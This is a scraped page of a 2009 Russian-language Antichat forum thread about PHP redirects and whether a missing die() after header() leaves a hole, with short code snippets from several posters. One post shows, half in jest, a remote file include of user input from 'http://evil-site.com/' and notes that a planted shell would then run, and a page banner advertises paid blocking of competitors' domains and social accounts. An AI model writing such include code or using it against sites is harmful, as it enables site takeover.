УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > Программирование > PHP, PERL, MySQL, JavaScript
переход по заданному адресу [PHP]

Страница 5 из 6

Опции темы

Поиск в этой теме

Опции просмотра

#41

31.07.2009, 13:41

BlackSun

Members of Antichat - Level 5

Регистрация: 01.04.2007

Сообщений: 1,268

Провел на форуме:
10046345

Репутация: 4589

#42

03.08.2009, 08:57

попугай

Познавший АНТИЧАТ

Регистрация: 15.01.2008

Сообщений: 1,166

Провел на форуме:
2459557

Репутация: 606

А зачем вообще die() после header() ?
Какая уязвимость может быть тут? Можно пример?

#43

03.08.2009, 12:51

Spyder

Members of Antichat - Level 5

Регистрация: 09.10.2006

Сообщений: 1,698

Провел на форуме:
9098076

Репутация: 4303

попугай, в статье электа описано
Вообще багой это будет если например скрипт аплода файлов в админке проверяет залогинен ли ты, если не залогинен тебя ридеректает ява скриптом на login.php, но после редиректа не стоит die(), ты можешьи отправив запрос скриптом обойти эту проверку

Видимо Пашкела просто прочитал статью ничего не поняв и пытается доказать что в этом коде есть ужасная бага, т.к в данном скрипте ничего опасно нет, посты Пашкелы выглядят немного бредом.
Конечно не стоит забывать про особые обстоятельства

__________________
God forgive me for I have sinned
It’s been six months since my last confession
There is nowhere that I can run to
My soul I place in your hands

Последний раз редактировалось Spyder; 14.08.2009 в 03:25..

#44

03.08.2009, 13:14

Twoster

Reservists Of Antichat - Level 6

Регистрация: 20.08.2008

Сообщений: 328

Провел на форуме:
7144817

Репутация: 1503

Ув.Spyder, готов с Вами подискутировать на эту тему!
А если будет листинг кода подобный этому?

PHP код:


		
			
switch($_GET['url'])

{

    case "test":

    header("location:http://google.ru");

    include('http://evil-site.com/'.$_GET['url'].'.txt')

    break;

    case "test2":

    header("location:http://yandex.ru");

    default:

    header("location:http://google.ru?error");

    or die('Ошибон :D');

    break;

}

тогда этот буквально как решето!!! всего лишь нужно похекать сайт http://evil-site.com/, и залить туда шелл с именем test.txt и все!!! Мы похеканы! а вот был бы код такой :

PHP код:


		
			
   case "test":

    header("location:http://google.ru"); 

    die();

    include('http://evil-site.com/'.$_GET['url'].'.txt')

    break;

Мы бы были защищены! =)
Ты просто не знаешь особых условий, чтобы switch сделать инклудом

__________________

You may say I'm a dreamer
But I'm not the only one

#45

03.08.2009, 13:19

GreenBear

наркоман с медалью

Регистрация: 07.05.2005

Сообщений: 3,704

Провел на форуме:
19975136

Репутация: 4536

Отправить сообщение для GreenBear с помощью ICQ

PHP код:


		
			
<?php

if(isset($_REQUEST['url'])) {

    switch($_REQUEST['url']]) {

        case 'test':

            header("Location: http://goggle.com");

            break;

        case 'test2':

            header("Location: http://yandex.ru");

            break;

        default:

            header("Location: http://google.com/error");

            break;

    }

    exit;

}

?>

<form>

<input type="text" name="url">

<input type="submit">

</form>

__________________
Фреймворк для спамера :(
Услуги программирования

#46

03.08.2009, 13:21

GreenBear

наркоман с медалью

Регистрация: 07.05.2005

Сообщений: 3,704

Провел на форуме:
19975136

Репутация: 4536

ебаный насос, да вы тут развели 5 страниц на 5 строк кода. даже не заметил.

__________________
Фреймворк для спамера :(
Услуги программирования

#47

03.08.2009, 13:26

Spyder

Members of Antichat - Level 5

Регистрация: 09.10.2006

Сообщений: 1,698

Провел на форуме:
9098076

Репутация: 4303

GreenBear, ппц, ты не в курсе что у тебя в коде 4 баги? Забыл что надо die() ставить? Вступай в наш фан-клуб, узнаешь как писать безопасный код

__________________
God forgive me for I have sinned
It’s been six months since my last confession
There is nowhere that I can run to
My soul I place in your hands

#48

03.08.2009, 13:28

GreenBear

наркоман с медалью

Регистрация: 07.05.2005

Сообщений: 3,704

Провел на форуме:
19975136

Репутация: 4536

:'(

__________________
Фреймворк для спамера :(
Услуги программирования

#49

03.08.2009, 13:28

попугай

Познавший АНТИЧАТ

Регистрация: 15.01.2008

Сообщений: 1,166

Провел на форуме:
2459557

Репутация: 606

Цитата:

Сообщение от Spyder

попугай, в статье электа описано
Вообще багой это будет если например скрипт аплода файлов в админке проверяет залогинен ли ты, если не залогинен тебя ридеректает на login.php, но после редиректа не стоит die(), ты можешьи отправив запрос скриптом обойти эту проверку

Да статью я читал и не раз.. но тем не менее не могу понять в чем уязвимость...

Вот например такой код из твоего примера...

PHP код:


		
			
if(!$logged){

header('location: url');

}else{

move_upload_file();

}

Какая тут уязвимость может быть?......

#50

03.08.2009, 13:29

GreenBear

наркоман с медалью

Регистрация: 07.05.2005

Сообщений: 3,704

Провел на форуме:
19975136

Репутация: 4536

попугай, вы тут все какую - то ересь несете ))

__________________
Фреймворк для спамера :(
Услуги программирования

Страница 5 из 6

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
[php] переход на страницу:)	AdR3naL1ne	PHP, PERL, MySQL, JavaScript	8	15.06.2009 15:18
Proxy FAQ	foreva	Чужие Статьи	12	04.01.2008 12:15

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход